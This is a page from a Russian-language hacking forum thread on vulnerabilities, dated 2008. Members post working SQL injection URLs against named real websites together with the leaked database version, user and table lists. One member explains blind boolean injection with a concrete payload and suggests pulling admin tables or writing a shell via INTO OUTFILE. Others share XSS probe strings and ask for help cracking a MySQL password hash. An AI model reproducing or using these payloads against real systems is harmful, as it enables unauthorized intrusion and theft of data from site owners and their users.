ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 137 из 1393 « Первая < 3787127 133 134 135 136 137 138 139 140 141 1471872376371137 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1361  
Старый 23.03.2008, 23:42
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Цитата:
Сообщение от mff  
Ребят поделитесь скриптами для облегчения работы со скулью. Поиск на форуме не помагает

Всем за ранее спасибо!
http://toxa.nov.ru/sql.txt
Цитата:
Жесть, а что то можно еще сделать?
искать таблицы юзеров\админов например или пытаться залить шелл через into outfile
__________________
 

  #1362  
Старый 23.03.2008, 23:42
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию
Учусь!
Украинский морской институт
Цитата:
http://www.umi.com.ua/?do=news&id=-77+union+select+1,concat_ws(0x3a,version(),databas e(),user())/*
---------------------------------------------------------
5.0.22-log:vnmamontov9_umi:umi@localhost
---------------------------------------------------------
доступ к information_schema.tables но там нету ничего интересного
есть форум, судя по исходникам smf
Цитата:
<script language="JavaScript" type="text/javascript"><!-- // --><![CDATA[
var smf_theme_url = "http://umi.com.ua/forum/Themes/babylon";
var smf_images_url = "http://umi.com.ua/forum/Themes/babylon/images";
var smf_scripturl = "http://umi.com.ua/forum/index.php?PHPSESSID=f5hg5bto4jkppsev38lj403l12&amp ;";
var smf_iso_case_folding = false;
var smf_charset = "windows-1251";
// ]]></script>
но таблицы smf_members несуществует.
Очень интересно, есть ли вариант вытянуть что нибудь интересное или может я неправильно определил форум?
-----------------------------------------------------
Цитата:
http://www.housemarket.com.ua/catalog.html?id=3/**/union/**/select/**/1,2,3,4,5,6,7/*
тоже очень интересная-вывода вообще никакого нет, подскажите как быть в этом случае?(подзапросы?)
-----------------------------------------------------
Цитата:
http://kram.in.ua/article/19`
интересно
информативный вывод, но у меня все же ничего не получилось
-------------------------------------------------------
Всем, кто откликнется-СПАСИБО
 

  #1363  
Старый 23.03.2008, 23:49
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
2 samarin
бд с форумом тебе недоступна .
все таблцы те доступные
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
announcements
collective
course_price
group_collective
lib_new_receipts
lib_news
lib_receipts
lib_receipts_page
news
resources
resources_part
utc_news
во втором случае тебе надо найти хотя бы одну существующую таблицу, а дальше уже будет возможен посимвольный перебор, типа
Код:
http://www.housemarket.com.ua/catalog.html?id=3+and+if(substring(version(),1,1)=5,(select+1+from+xxx),(select+1+from+xxx+limit+0,1))/*
Вместо xxx пишешь свою таблицу. При выполнении условия будет ошибка, при невыполнении - пустой лист.
__________________
Последний раз редактировалось +toxa+; 24.03.2008 в 00:01..
 

  #1364  
Старый 23.03.2008, 23:58
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию
Цитата:
2 samarin
бд с форумом тебе недоступна .
все таблцы те доступные
Я ж писал
Цитата:
доступ к information_schema.tables но там нету ничего интересного
покрайней мере интересного я не нашел
Последний раз редактировалось samarin; 24.03.2008 в 00:00..
 

  #1365  
Старый 24.03.2008, 00:55
Titop
Новичок
Регистрация: 20.09.2007
Сообщений: 17
Провел на форуме:
103803

Репутация: 2
По умолчанию
В общем таскался по вашему форуму,что бы задать конктретные вопросы по xss уязвимостям,но нифига не нашел.Почитал статейки, и вот что меня интересует.
1.xss- это ведь не глупый перебор типа '><script>alert(document.cookie)</script>,или другие возможные варианты подставления в панель адреса?
2.где я могу найти подробный мануал по xss?все ссылки о xss я здесь просматрел
и гугль тоже юзаю.
 

  #1366  
Старый 24.03.2008, 01:54
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию
народ, объясните пожалуйста почему столбцы показывает только при таком запросе
http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8+from+users
а не как обычно
http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8/*
ась?

кто-нибудь гляньте меня интересует этот вопрос.
Последний раз редактировалось bag; 24.03.2008 в 18:33..
 

  #1367  
Старый 24.03.2008, 02:05
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Цитата:
Сообщение от Titop  
В общем таскался по вашему форуму,что бы задать конктретные вопросы по xss уязвимостям,но нифига не нашел.Почитал статейки, и вот что меня интересует.
1.xss- это ведь не глупый перебор типа '><script>alert(document.cookie)</script>,или другие возможные варианты подставления в панель адреса?
2.где я могу найти подробный мануал по xss?все ссылки о xss я здесь просматрел
и гугль тоже юзаю.
https://forum.antichat.ru/thread42326.html
__________________
 

  #1368  
Старый 24.03.2008, 02:22
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Цитата:
Сообщение от Titop  
все ссылки о xss я здесь просматрел
и гугль тоже юзаю.

http://ha.ckers.org/xss.html =\
 

  #1369  
Старый 24.03.2008, 03:59
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
Thumbs up
Люди есть у кого словари под PasswordsPro для атаки MySQL хэшей, поделитесь, плис.
Или может кто посоветует другую программу для расшифровки вот такого хэша:6cb1963d2018c3ea

Буду очень признателен!
Спасибо!
 

  #1370  
Старый 24.03.2008, 04:39
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
Цитата:
Сообщение от Titop  
возможные варианты подставления в панель адреса?
самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет
 
 
Страница 137 из 1393 « Первая < 3787127 133 134 135 136 137 138 139 140 141 1471872376371137 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ